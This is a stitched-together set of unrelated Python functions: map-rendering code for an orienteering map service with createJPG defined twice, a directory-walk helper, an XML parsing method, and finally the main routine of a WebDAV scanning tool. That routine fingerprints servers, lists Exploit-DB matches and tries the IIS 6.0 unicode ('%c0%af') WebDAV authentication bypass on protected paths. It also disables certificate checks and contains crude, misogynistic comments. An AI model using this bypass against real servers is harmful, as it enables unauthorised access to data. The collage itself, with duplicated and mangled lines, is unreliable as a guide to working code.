MAP_NM - MAP_SM mapSLat = clat - (MAP_H/2)*scaleCorrected mapNLat = clat + (MAP_H/2)*scaleCorrected mapWLon = clon - (MAP_W/2)*scaleCorrected mapELon = clon + (MAP_W/2)*scaleCorrected styleFile = home + "/styles/" + style + ".xml" cbbox = mapnik.Box2d(mapWLon,mapSLat,mapELon,mapNLat) # Limit the size of map we are prepared to produce if PAPER_W * PAPER_H > 0.25 and style != "adhoc": # Roughly A2 size. return "Map too large. Try increasing the scale value or using a smaller paper size." if scale > 50000 and style != "adhoc": return "Scale too small. Try using a lower scale value." # Create map map = mapnik.Map(int(MAP_W*S2P), int(MAP_H*S2P)) # Load map configuration mapnik.load_map(map, styleFile) # Zoom the map to the Gbounding box map.zoom_to_box(cbbox) file = tempfile.NamedTemporaryFile() surface = cairo.ImageSurface(cairo.FORMAT_ARGB32, int(PAPER_W*S2P), int(PAPER_H*S2P)) # Adornments - Title swoosh back ctx = cairo.Context(surface) ctx.translate(0, 0) ctx.set_line_width(1) ctx.move_to(0, 0) ctx.rel_line_to(0, 0.25*PAPER_H*S2P) ctx.rel_line_to(0.2*PAPER_W*S2P, 0) ctx.rel_line_to(0.4*PAPER_W*S2P, -0.25*PAPER_H*S2P) ctx.close_path() ctx.set_source_rgb(0.91, 0.15, 0.28) if style == "oterrain_ioa" or style == "streeto_ioa" or style == "streeto_norail_ioa": ctx.set_source_rgb(0.12, 0.53, 0.27) if style != 'blueprint': ctx.fill() #Adornments - Attrib swoosh back ctx = cairo.Context(surface) ctx.translate(0, 0) ctx.set_line_width(1) ctx.move_to(PAPER_W*S2P, PAPER_H*S2P) ctx.rel_line_to(0, -0.25*PAPER_H*S2P) ctx.rel_line_to(-0.2*PAPER_W*S2P, 0) ctx.rel_line_to(-0.4*PAPER_W*S2P, 0.25*PAPER_H*S2P) ctx.close_path() ctx.set_source_rgb(0.12, 0.4, 0.67) if style == "oterrain_ioa" or style == "streeto_ioa" or style == "streeto_norail_ioa": ctx.set_source_rgb(0.89, 0.44, 0.24) if style != "blueprint": ctx.fill() # Background map ctx = cairo.Context(surface) ctx.translate(MAP_WM*S2P, MAP_NM*S2P) mapnik.render(map, ctx) if style == "adhoc": ctx = cairo.Context(surface) ctx.set_source_rgb(1, 1, 1) ctx.select_font_face("Arial", cairo.FONT_SLANT_NORMAL, cairo.FONT_WEIGHT_NORMAL) ctx.set_font_size(0.5) text = path ctx.translate(MAP_WM*S2P, (MAP_NM+MAP_H+0.001)*S2P) ctx.show_text(text) surface.write_to_png(file.name) return file # Start control if slon != 0 and slat != 0: ctx = cairo.Context(surface) ctx.set_line_width(SC_T*S2P) ctx.set_line_join(cairo.LINE_JOIN_ROUND) ctx.set_source_rgb(1, 0, 1) ctx.translate((MAP_WM+((slon-mapWLon)/scaleCorrected))*S2P, (MAP_NM+((mapNLat-slat)/scaleCorrected))*S2P) ctx.move_to(0, -0.577*SC_W*S2P) ctx.rel_line_to(-0.5*SC_W*S2P, 0.866*SC_W*S2P) ctx.rel_line_to(SC_W*S2P, 0) ctx.close_path() ctx.stroke() # Controls and labels if len(controlsArr) > 0: ctx = cairo.Context(surface) ctx.set_source_rgb(1, 0, 1) ctx.select_font_face("Arial", cairo.FONT_SLANT_NORMAL, cairo.FONT_WEIGHT_NORMAL) ctx.set_font_size(CTEXT_S*S2P) numControls = len(controlsArr)/4 for i in range(numControls): text = controlsArr[4*i] labelAngle = float(controlsArr[4*i+1]) controllat = float(controlsArr[4*i+2]) controllon = float(controlsArr[4*i+3]) controllatP = MAP_NM+((mapNLat-controllat)/scaleCorrected) controllonP = MAP_WM+((controllon-mapWLon)/scaleCorrected) ctx.move_to((controllonP+C_R)*S2P, controllatP*S2P) ctx.set_line_width(C_T*S2P) ctx.arc(controllonP*S2P, controllatP*S2P, C_R*S2P, 0, 2*math.pi) ctx.stroke() ctx.move_to((controllonP+CDOT_R)*S2P, controllatP*S2P) ctx.arc(controllonP*S2P, controllatP*S2P, CDOT_R*S2P, 0, 2*math.pi) ctx.fill() x_bearing, y_bearing, width, height = ctx.text_extents(text)[:4] labelX = C_R*2.5*math.sin(math.pi*labelAngle/180) labelY = C_R*2.5*math.cos(math.pi*labelAngle/180) ctx.move_to((controllonP+labelX)*S2P-width/2, (controllatP-labelY)*S2P+height/2) ctx.show_text(text) # Crosses and labels if len(crossesArr) > 0: ctx = cairo.Context(surface) ctx.set_source_rgb(1, 0, 1) ctx.select_font_face("Arial", cairo.FONT_SLANT_NORMAL, cairo.FONT_WEIGHT_BOLD) ctx.set_font_size(CTEXT_S*S2P/1.5) ctx.set_source_rgb(1, 0, 0) numCrosses = len(crossesArr)/2 for i in range(numCrosses): text = "X" controllat = float(crossesArr[2*i]) controllon = float(crossesArr[2*i+1]) controllatP = MAP_NM+((mapNLat-controllat)/scaleCorrected) controllonP = MAP_WM+((controllon-mapWLon)/scaleCorrected) #ctx.move_to((controllonP)*S2P, controllatP*S2P) x_bearing, y_bearing, width, height = ctx.text_extents(text)[:4] #labelX = C_R*2.5*math.sin(math.pi*labelAngle/180) #labelY = C_R*2.5*math.cos(math.pi*labelAngle/180) ctx.move_to((controllonP)*S2P-width/2, (controllatP)*S2P+height/2) ctx.show_text(text) # Adornments - Title ctx = cairo.Context(surface) ctx.select_font_face("Arial", cairo.FONT_SLANT_ITALIC, cairo.FONT_WEIGHT_NORMAL) if style == 'blueprint': ctx.select_font_face("Impact", cairo.FONT_SLANT_NORMAL, cairo.FONT_WEIGHT_NORMAL) text = urllib.unquote(title) if len(text) > 28: ctx.set_font_size(15) elif len(text) > 20: ctx.set_font_size(18) else: ctx.set_font_size(21) ctx.translate(MAP_WM*S2P, (MAP_NM-ADORN_TITLE_SM)*S2P) if style == 'blueprint': ctx.set_source_rgb(0, 0.5, 0.8) else: ctx.set_source_rgb(1, 1, 1) ctx.show_text(text.upper()) # Adornments - Scale Text ctx = cairo.Context(surface) ctx.select_font_face("Arial", cairo.FONT_SLANT_NORMAL, cairo.FONT_WEIGHT_NORMAL) text = "scale 1:" + str(scale) if style == "oterrain" or style == "streeto" or style == "streeto_norail": text = "scale 1:" + str(scale) + ", contours 10m" ctx.set_font_size(11) width = ctx.text_extents(text)[4] ctx.translate((MAP_WM+MAP_W)*S2P-width-(ADORN_ARROW_W+ADORN_LOGO_W)*S2P, (MAP_NM-ADORN_SCALE_SM)*S2P) ctx.show_text(text) # Adornments - Scale Bar and Caption ctx = cairo.Context(surface) ctx.select_font_face("Arial", cairo.FONT_SLANT_NORMAL, cairo.FONT_WEIGHT_NORMAL) scaleBarMetres = 500 if scale < 10000: scaleBarMetres = 200 text = str(scaleBarMetres) + "m" ctx.set_font_size(7) width = ctx.text_extents(text)[4] barCaptionX = (MAP_WM+MAP_W-(ADORN_ARROW_W+ADORN_LOGO_W))*S2P-width ctx.translate(barCaptionX, (MAP_NM-ADORN_SCALEBAR_SM)*S2P) ctx.show_text(text) ctx.set_line_width(0.5) scaleBarW = scaleBarMetres/float(scale) ctx.move_to((-scaleBarW-ADORN_SCALEBAR_PADDING)*S2P, 0) ctx.rel_line_to(0, -ADORN_SCALEBAR_LARGETICK*S2P) ctx.rel_line_to(0, ADORN_SCALEBAR_LARGETICK*S2P) ctx.rel_line_to(scaleBarW*S2P/2, 0) ctx.rel_line_to(0, -ADORN_SCALEBAR_SMALLTICK*S2P) ctx.rel_line_to(0, ADORN_SCALEBAR_SMALLTICK*S2P) ctx.rel_line_to(scaleBarW*S2P/2, 0) ctx.rel_line_to(0, -ADORN_SCALEBAR_LARGETICK*S2P) ctx.stroke() # Adornments - North Arrow ctx = cairo.Context(surface) ctx.translate((MAP_WM+MAP_W-ADORN_LOGO_W)*S2P-width, CONTENT_NM*S2P) ctx.set_line_width(1) ctx.move_to(0, 0) ctx.line_to(0.001*S2P, 0.002*S2P) ctx.line_to(-0.001*S2P, 0.002*S2P) ctx.close_path() ctx.fill() ctx.move_to(0, 0.001*S2P) ctx.line_to(0, 0.008*S2P) ctx.stroke() ctx.set_line_join(cairo.LINE_JOIN_ROUND) ctx.set_line_cap(cairo.LINE_CAP_ROUND) ctx.move_to(-0.001*S2P, 0.005*S2P) ctx.rel_line_to(0, -0.002*S2P) ctx.rel_line_to(0.002*S2P, 0.002*S2P) ctx.rel_line_to(0, -0.002*S2P) ctx.stroke() # Adornments - Logo if style == "oterrain_ioa" or style == "streeto_ioa" or style == "streeto_norail_ioa": logoSurface = cairo.ImageSurface.create_from_png(home + "/images/ioalogo.png") ctx = cairo.Context(surface) width = logoSurface.get_width()*ADORN_LOGO_SCALE_IOA ctx.translate((MAP_WM+MAP_W)*S2P-width, CONTENT_NM*S2P) ctx.scale(ADORN_LOGO_SCALE_IOA, ADORN_LOGO_SCALE_IOA) ctx.set_source_surface(logoSurface, 0, 0) ctx.paint() elif style == "oterrain" or style == "streeto" or style == "streeto_norail": logoSurface = cairo.ImageSurface.create_from_png(home + "/images/boflogo.png") ctx = cairo.Context(surface) width = logoSurface.get_width()*ADORN_LOGO_SCALE ctx.translate((MAP_WM+MAP_W)*S2P-width, CONTENT_NM*S2P) ctx.scale(ADORN_LOGO_SCALE, ADORN_LOGO_SCALE) ctx.set_source_surface(logoSurface, 0, 0) ctx.paint() elif style == "blueprint": logoSurface = cairo.ImageSurface.create_from_png(home + "/images/blueprintlogo.png") ctx = cairo.Context(surface) width = logoSurface.get_width()*ADORN_LOGO_SCALE ctx.translate((MAP_WM+MAP_W)*S2P-width, CONTENT_NM*S2P) ctx.scale(ADORN_LOGO_SCALE, ADORN_LOGO_SCALE) ctx.set_source_surface(logoSurface, 0, 0) ctx.paint() else: logoSurface = cairo.ImageSurface.create_from_png(home + "/images/globallogo.png") ctx = cairo.Context(surface) width = logoSurface.get_width()*ADORN_LOGO_SCALE ctx.translate((MAP_WM+MAP_W)*S2P-width, CONTENT_NM*S2P) ctx.scale(ADORN_LOGO_SCALE, ADORN_LOGO_SCALE) ctx.set_source_surface(logoSurface, 0, 0) ctx.paint() # Adornments - Attribution left line 1 ctx = cairo.Context(surface) ctx.select_font_face("Arial", cairo.FONT_SLANT_ITALIC, cairo.FONT_WEIGHT_NORMAL) ctx.set_source_rgb(0.12, 0.4, 0.67) if style == 'blueprint': ctx.set_source_rgb(0, 0.5, 0.8) ctx.set_font_size(7) text = "Map data (c) OpenStreetMap and available under the Open Database Licence." ctx.translate((MAP_WM)*S2P, (MAP_NM+MAP_H+ADORN_ATTRIB_NM)*S2P) ctx.show_text(text) if style == "oterrain" or style == "streeto" or style == "streeto_norail": # Adornments - Attribution left line 2 ctx = cairo.Context(surface) ctx.select_font_face("Arial", cairo.FONT_SLANT_ITALIC, cairo.FONT_WEIGHT_NORMAL) ctx.set_source_rgb(0.12, 0.4, 0.67) ctx.set_font_size(7) text = "Contains Ordnance Survey data (c) Crown copyright & database right 2013." ctx.translate((MAP_WM)*S2P, (MAP_NM+MAP_H+ADORN_ATTRIB_NM+0.002)*S2P) ctx.show_text(text) #Adornments - Attribution left line 3 ctx = cairo.Context(surface) ctx.select_font_face("Arial", cairo.FONT_SLANT_ITALIC, cairo.FONT_WEIGHT_NORMAL) ctx.set_source_rgb(0.12, 0.4, 0.67) ctx.set_font_size(7) text = "Service created by Oliver O'Brien. Make your own: http://oomap.co.uk/" ctx.translate((MAP_WM)*S2P, (MAP_NM+MAP_H+ADORN_ATTRIB_NM+0.004)*S2P) ctx.show_text(text) if style == "oterrain" or style == "streeto" or style == "streeto_norail": #Adornments - Attribution right line 1 ctx = cairo.Context(surface) ctx.select_font_face("Arial", cairo.FONT_SLANT_ITALIC, cairo.FONT_WEIGHT_BOLD) ctx.set_source_rgb(1, 1, 1) ctx.set_font_size(9) text = "OpenOrienteeringMap was partially developed with a British Orienteering grant" width = ctx.text_extents(text)[4] ctx.translate((MAP_WM+MAP_W)*S2P-width, (MAP_NM+MAP_H+ADORN_ATTRIB_NM)*S2P) ctx.show_text(text) #Attribution right line 2 ctx = cairo.Context(surface) ctx.select_font_face("Arial", cairo.FONT_SLANT_ITALIC, cairo.FONT_WEIGHT_NORMAL) ctx.set_source_rgb(1, 1, 1) ctx.set_font_size(9) text = "Map ID: " + mapid width = ctx.text_extents(text)[4] ctx.translate((MAP_WM+MAP_W)*S2P-width, (MAP_NM+MAP_H+ADORN_ATTRIB_NM+ADORN_ATTRIB_NM)*S2P) ctx.show_text(text) # Adornments - URL ctx = cairo.Context(surface) ctx.select_font_face("Arial", cairo.FONT_SLANT_NORMAL, cairo.FONT_WEIGHT_NORMAL) ctx.set_font_size(0.5) text = path ctx.translate(MAP_WM*S2P, (MAP_NM+MAP_H+ADORN_URL_NM)*S2P) ctx.show_text(text) surface.write_to_png(file.name + '.png') im = Image.open(file.name + '.png') bg = Image.new("RGB", im.size, (255,255,255)) bg.paste(im,im) bg.save(file.name, 'JPEG', quality=95) #bg.save(file.name, 'GIF') return file
def isforbidden(path): for forbidden in FORBIDDEN_DIR: if path.count(forbidden)>0: return True return False
def createJPG(path): import tempfile # Specifically declare these as global, as we may change them. global MAP_NM, MAP_EM, MAP_SM, MAP_WM if path.count("|") < 8 or path.count("|") > 9 or len(path) < 30: return "Incorrectly formatted string." if path.count("|") == 8: path = path + "|" style, paper, scale, centre, title, club, mapid, start, crosses, controls = path.split("|") style = style.split("=")[1] paper = paper.split("=")[1] PAPER_W = float(paper.split(",")[0]) PAPER_H = float(paper.split(",")[1]) scale = int(scale.split("=")[1]) centre = centre.split("=")[1] clat = int(centre.split(",")[0]) clon = int(centre.split(",")[1]) projection = mapnik.Projection(EPSG900913) wgs84lat = mapnik.Coord(clon, clat).inverse(projection).y scaleCorrectionFactor = math.cos(wgs84lat * math.pi/180) scaleCorrected = scale / scaleCorrectionFactor if style == "adhoc": MAP_EM = MAP_WM MAP_NM = MAP_WM MAP_SM = MAP_WM MAP_W = PAPER_W - MAP_WM - MAP_EM MAP_H = PAPER_H - MAP_NM - MAP_SM paperSLat = clat - (MAP_H/2+MAP_SM)*scaleCorrected paperNLat = clat + (MAP_H/2+MAP_NM)*scaleCorrected paperWLon = clon - (MAP_W/2+MAP_WM)*scaleCorrected paperELon = clon + (MAP_W/2+MAP_EM)*scaleCorrected # Limit the size of map we are prepared to produce if PAPER_W * PAPER_H > 0.25 and style != "adhoc": # Roughly A2 size. return "Map too large. Try increasing the scale value or using a smaller paper size." if scale > 50000 and style != "adhoc": return "Scale too small. Try using a lower scale value." PIXEL_W = PAPER_W*S2P PIXEL_H = PAPER_H*S2P #TODO Write lines to file here. fworld = tempfile.NamedTemporaryFile() #with open('temp.jgw', 'wb') as fworld: fworld.write(str((paperELon - paperWLon)/PIXEL_W) + "\n") fworld.write(str(0) + "\n") fworld.write(str(0) + "\n") fworld.write(str((paperSLat - paperNLat)/PIXEL_H) + "\n") fworld.write(str(paperWLon) + "\n") fworld.write(str(paperNLat) + "\n") fworld.seek(0) #return open('temp.jgw', 'rb') return fworld
def my_ismount(path): depth = path.count('/') if path.startswith('/media'): return depth == 0 or depth == 2 return depth <= 1
def createJPG(path): import tempfile # Specifically declare these as global, as we may change them. global MAP_NM, MAP_EM, MAP_SM, MAP_WM if path.count("|") < 8 or path.count("|") > 9 or len(path) < 30: return "Incorrectly formatted string." if path.count("|") == 8: path = path + "|" style, paper, scale, centre, title, club, mapid, start, crosses, controls = path.split( "|") style = style.split("=")[1] paper = paper.split("=")[1] PAPER_W = float(paper.split(",")[0]) PAPER_H = float(paper.split(",")[1]) scale = int(scale.split("=")[1]) centre = centre.split("=")[1] clat = int(centre.split(",")[0]) clon = int(centre.split(",")[1]) projection = mapnik.Projection(EPSG900913) wgs84lat = mapnik.Coord(clon, clat).inverse(projection).y scaleCorrectionFactor = math.cos(wgs84lat * math.pi / 180) scaleCorrected = scale / scaleCorrectionFactor if style == "adhoc": MAP_EM = MAP_WM MAP_NM = MAP_WM MAP_SM = MAP_WM MAP_W = PAPER_W - MAP_WM - MAP_EM MAP_H = PAPER_H - MAP_NM - MAP_SM paperSLat = clat - (MAP_H / 2 + MAP_SM) * scaleCorrected paperNLat = clat + (MAP_H / 2 + MAP_NM) * scaleCorrected paperWLon = clon - (MAP_W / 2 + MAP_WM) * scaleCorrected paperELon = clon + (MAP_W / 2 + MAP_EM) * scaleCorrected # Limit the size of map we are prepared to produce if PAPER_W * PAPER_H > 0.25 and style != "adhoc": # Roughly A2 size. return "Map too large. Try increasing the scale value or using a smaller paper size." if scale > 50000 and style != "adhoc": return "Scale too small. Try using a lower scale value." PIXEL_W = PAPER_W * S2P PIXEL_H = PAPER_H * S2P #TODO Write lines to file here. fworld = tempfile.NamedTemporaryFile() #with open('temp.jgw', 'wb') as fworld: fworld.write(str((paperELon - paperWLon) / PIXEL_W) + "\n") fworld.write(str(0) + "\n") fworld.write(str(0) + "\n") fworld.write(str((paperSLat - paperNLat) / PIXEL_H) + "\n") fworld.write(str(paperWLon) + "\n") fworld.write(str(paperNLat) + "\n") fworld.seek(0) #return open('temp.jgw', 'rb') return fworld
def filter_walk(top, file_pattern=None, dir_pattern=None, depth=None, onerror=None, followlinks=False, onloop=None): """filter_walk is similar to os.walk, but offers the following additional features: - yields a named tuple of (path, subdirs, files, depth) - allows a recursion depth limit to be specified - allows independent glob-style filters for filenames and subdirectories - emits a message to stderr and skips the directory if a symlink loop is encountered when following links Selective walks are always top down, as the directory listings must be altered to provide the above features. If not None, depth must be at least 0. A depth of zero can be useful to get separate filtered subdirectory and file listings for a given directory. onerror is passed to os.walk to handle os.listdir errors followlinks is passed to os.walk and enables the symbolic loop detection onloop (if provided) can be used to override the default symbolic loop handling. It is called with the directory path as an argument when a loop is detected. Any false return value will skip the directory as normal, any true value means the directory will be processed. """ if depth is not None and depth < 0: msg = "Depth limit must be None or greater than 0 ({!r} provided)" raise ValueError(msg.format(depth)) if onloop is None: def onloop(path): msg = "Symlink {!r} refers to a parent directory, skipping\n" sys.stderr.write(msg.format(path)) sys.stderr.flush() if followlinks: real_top = os.path.abspath(os.path.realpath(top)) sep = os.sep initial_depth = top.count(sep) for path, walk_subdirs, files in os.walk(top, topdown=True, onerror=onerror, followlinks=followlinks): # Check for symlink loops if followlinks and os.path.islink(path): # We just descended into a directory via a symbolic link # Check if we're referring to a directory that is # a parent of our nominal directory relative = os.path.relpath(path, top) nominal_path = os.path.join(real_top, relative) real_path = os.path.abspath(os.path.realpath(path)) path_fragments = zip(nominal_path.split(sep), real_path.split(sep)) for nominal, real in path_fragments: if nominal != real: break else: if not onloop(path): walk_subdirs[:] = [] continue # Filter files, if requested if file_pattern is not None: files = fnmatch.filter(files, file_pattern) # We hide the underlying generator's subdirectory list, since we # clear it internally when we reach the depth limit (if any) if dir_pattern is None: subdirs = walk_subdirs[:] else: subdirs = fnmatch.filter(walk_subdirs, dir_pattern) # Report depth current_depth = path.count(sep) - initial_depth yield WalkedDir(path, subdirs, files, current_depth) # Filter directories and implement depth limiting if depth is not None and current_depth >= depth: walk_subdirs[:] = [] else: walk_subdirs[:] = subdirs
def iterfind(self, path, namespaces=None, nsmap=None, ancestors=None): """ Apply XPath selection to XML resource that yields full subtrees. :param path: an XPath expression to select element nodes. :param namespaces: an optional mapping from namespace prefixes to URIs \ used for parsing the XPath expression. :param nsmap: provide a list/dict for tracking the namespaces of yielded \ elements. If a list is passed the tracking is done at element level, otherwise \ the tracking is on the whole tree, renaming prefixes in case of conflicts. :param ancestors: provide a list for tracking the ancestors of yielded elements. """ if self._lazy: selector = LazySelector(path, namespaces) path = path.replace(' ', '').replace('./', '') resource = self.open() level = 0 select_all = '*' in path and set(path).issubset({'*', '/'}) if path == '.': subtree_level = 0 elif path.startswith('/'): subtree_level = path.count('/') - 1 else: subtree_level = path.count('/') + 1 try: for event, node in self._lazy_iterparse(resource, nsmap): if event == "start": if ancestors is not None and level < subtree_level: ancestors.append(node) level += 1 else: level -= 1 if not level: if subtree_level: pass elif select_all or node in selector.select(self._root): yield node elif not subtree_level: continue elif level != subtree_level: if ancestors is not None and level < subtree_level: ancestors.pop() continue # pragma: no cover elif select_all or node in selector.select(self._root): yield node del node[:] # delete children, keep attributes, text and tail. finally: if self._source is not resource: resource.close() else: if ancestors is None: selector = iter_select else: parent_map = self.parent_map ancestors.clear() def selector(*args, **kwargs): for e in iter_select(*args, **kwargs): if e is self._root: ancestors.clear() else: _ancestors = [] parent = e try: while True: parent = parent_map[parent] if parent is not None: _ancestors.append(parent) except KeyError: pass if _ancestors: ancestors.clear() ancestors.extend(reversed(_ancestors)) yield e if not self._nsmap or nsmap is None: yield from selector(self._root, path, namespaces, strict=False) else: _nsmap = None for elem in selector(self._root, path, namespaces, strict=False): try: if _nsmap is not self._nsmap[elem]: _nsmap = self._nsmap[elem] if isinstance(nsmap, list): nsmap.clear() nsmap.extend(_nsmap) else: for prefix, uri in _nsmap: self._update_nsmap(nsmap, prefix, uri) except KeyError: pass yield elem
def main(): sess = requests.Session() #see that? It's a capital S. Punctuation bitches! args = get_args() #assign variables url = args.url auth = args.auth user = args.user pswd = args.password outfile = args.outfile dos = args.dos msf = args.msf proxy = args.proxy if proxy is not None: proxies = ({urlparse(args.proxy).scheme: args.proxy}) sess.proxies = proxies unichar = "%c0%af" depth = args.depth # disable cert verification automatically because that just breaks shit. sess.verify = False #pretty pandas up in huuurrrr banner() #cut the url up like a hooker that stole some blow. You know what I'm talking about, Mikey. purl = urlparse(url) host = purl.netloc sess.headers = {'Host': purl.netloc, 'User-Agent': 'Mozilla/5.0 Windows NT 10.0; WOW64; rv:5.0) Gecko/20100101 Firefox/50.0' } #if outfile exists we append otherwise write if os.path.exists(outfile): o = open(outfile, "a") else: o = open(outfile, "w+") #set the auth header if needed if auth is not None: authstring = "%s:%s" % (user, pswd) encodedstring = base64.b64encode(authstring) sess.headers.update({'Authorization': 'Basic %s' % encodedstring}) #just clearing out unused args user = None pswd = None f = fingerprinter.fingerprint(sess,purl,msf,dos) server = f.get('Server', "No Server Header") davEnabled = f.get('WebDAV', 'Unknown') #clean up crap keys if 'Exploit Title' in f.keys(): f.pop('Exploit Title') if '' in f.keys(): f.pop('') directory = "" if server == "IIS/6.0" and davEnabled == "Enabled": dabp = True else: dabp = False #Start building our file (eventually a database) ## con = sqlite3.connect(outfile + '.db') ## db_setup(conn) with o as i: ## conn = sqlite3.connect(outfile + '.db') ##if db_setup(conn): i.write(bcolors.HEADER + "[*]==================={Server Fingerprint}===================[*] \n" + bcolors.ENDC) i.write(bcolors.HEADER + "[*] Server: " + server + "\n" + bcolors.ENDC) i.write(bcolors.HEADER + "[*] WebDAV: " + davEnabled + "\n" + bcolors.ENDC) i.write(bcolors.HEADER + "[*] WebDAV Auth Bypass: "******"\n" + bcolors.ENDC) i.write(bcolors.HEADER + "[*]==================={Exploit-DB Exploits}==================[*] \n" + bcolors.ENDC) for k,v in f.iteritems(): if k == "Server" or k == "WebDAV": next else: i.write(bcolors.OKGREEN + "[+]" + bcolors.ENDC + " %s ==> %s \n" % (k, v) ) i.write(bcolors.HEADER + "[*]===================={~Server Mapping~}====================[*] \n" + bcolors.ENDC) if davEnabled == "Enabled": sess.headers.update({'Depth': depth, 'Content-Type': 'application/xml'}) client = dav.Client() print("[*] First PROPFIND request may take a couple of minutes if the Depth header is infinity and a lot of data is returned.") r = client.propfind(sess,url) if r is None: i.write(bcolors.WARNING + "[-] PROPFIND REQUEST FAILED UNABLE TO CONTINUE" + bcolors.ENDC) print(bcolors.WARNING + "[-] PROPFIND request failed. Unable to continue" + bcolors.ENDC) sys.exit(1) for link in r[1].find_all('response'): if link.status is not None: stat = link.status.text.split(' ')[2].strip() if stat == 'OK': i.write(bcolors.OKGREEN + "[+] " + urlparse(link.href.text).path + " " + link.status.text + "\n" + bcolors.ENDC) elif link.status.text == "HTTP/1.1 401 Unauthorized" or link.status.text == "HTTP/1.1 502 Bad Gateway": i.write(bcolors.WARNING + "[-] " + link.href.text + " " + link.status.text + "\n" + bcolors.ENDC) i.write(bcolors.WARNING + "[-] Unauthorized status returned, attempting auth bypass...\n" + bcolors.ENDC) print(bcolors.WARNING + "[-] Unauthorized status returned, attempting auth bypass..." + bcolors.ENDC) url = urlparse(link.href.text) sess.headers.update({'Depth': '1'}) path = url.path if path[-1:] == '/' and path[:1] == '/' and path.count('/') == 2: p = path[1:][:-1] q = '' elif path.count('/') > 2: q = path[1:][:-1].split('/') p = q[0] d = len(q) if d !=0: u = url.scheme + "://" + url.netloc + "/" + p[:2] + "%c0%af" + p[2:] if isinstance(q,list): n = 1 while n != d: u = u + "/" + q[n] n = n + 1 #print("[*] DEBUG: " + u) #attempt propfind if url is a folder if link.href.text[-1:] == "/": resp = auth_bypass(sess,u,'propfind',i,client) else: resp = auth_bypass(sess,u,'get',i,client) if not resp: print(bcolors.FAIL + "[!] The server may be patched." + bcolors.ENDC) else: i.write(bcolors.WARNING + "[-] Unknown response status: %s " % str(stat) + "for: " + link.href.text + "\n" + bcolors.ENDC) else: print(bcolors.FAIL + "[!] WebDAV is not enabled" + bcolors.ENDC) i.close()